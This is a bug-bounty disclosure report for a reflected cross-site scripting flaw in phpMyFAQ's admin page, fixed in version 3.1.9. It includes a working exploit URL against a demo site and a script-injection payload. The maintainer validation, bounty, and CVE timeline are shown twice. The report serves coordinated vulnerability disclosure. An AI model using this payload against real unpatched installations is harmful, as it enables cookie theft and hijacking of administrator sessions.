Reflect Cross Site Scripting in thorsten/phpmyfaq

Valid

Reported on

Nov 26th 2022

Description

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.

Proof of Concept

Go to your web phpmyfaq and visit below URL.

Exploit URL: https://roy.demo.phpmyfaq.de/admin/index.php?action=SEX%22%3E%3CScRiPt%3Ealert(133333337)%3C/ScRiPt%3E

Payload USE:  "><ScRiPt>alert(9699)</ScRiPt>

#YO Maintainer :) Long Time No SEE !

Impact

Attacker can execute javascript, Anyone can steal the cookie, redirect to any URL and other lots of FUN.

We are processing your report and will contact the thorsten/phpmyfaq team within 24 hours. a month ago

A thorsten/phpmyfaq maintainer has acknowledged this report a month ago

Thorsten Rinne validated this vulnerability a month ago

AggressiveUser has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Thorsten Rinne marked this as fixed in 3.1.9 with commit 1d73af a month ago

Thorsten Rinne has been awarded the fix bounty

This vulnerability has been assigned a CVE

This vulnerability is scheduled to go public on Dec 31st 2022

AggressiveUser

commented a month ago

Researcher

Hi @maintainer can i have CVE for this valid report :), Allow @admin to do it.

Thorsten Rinne

commented a month ago

Maintainer

sure

AggressiveUser

commented a month ago

Researcher

Hi @Admin look in to this :)

Pavlos

commented a month ago

Admin

As you can see above, a CVE has been assigned and will be published on Dec 31st :))

Thorsten Rinne gave praise a month ago

Thanks, v3.1.9 is now released!

The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1

Thorsten Rinne published this vulnerability a month ago

to join this conversation

We are processing your report and will contact the thorsten/phpmyfaq team within 24 hours. a month ago

A thorsten/phpmyfaq maintainer has acknowledged this report a month ago

Thorsten Rinne validated this vulnerability a month ago

AggressiveUser has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Thorsten Rinne marked this as fixed in 3.1.9 with commit 1d73af a month ago

Thorsten Rinne has been awarded the fix bounty

This vulnerability has been assigned a CVE

This vulnerability is scheduled to go public on Dec 31st 2022

AggressiveUser

commented a month ago

Researcher

Hi @maintainer can i have CVE for this valid report :), Allow @admin to do it.

Thorsten Rinne

commented a month ago

Maintainer

sure

AggressiveUser

commented a month ago

Researcher

Hi @Admin look in to this :)

Pavlos

commented a month ago

Admin

As you can see above, a CVE has been assigned and will be published on Dec 31st :))

Thorsten Rinne gave praise a month ago

Thanks, v3.1.9 is now released!

The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1

Thorsten Rinne published this vulnerability a month ago

to join this conversation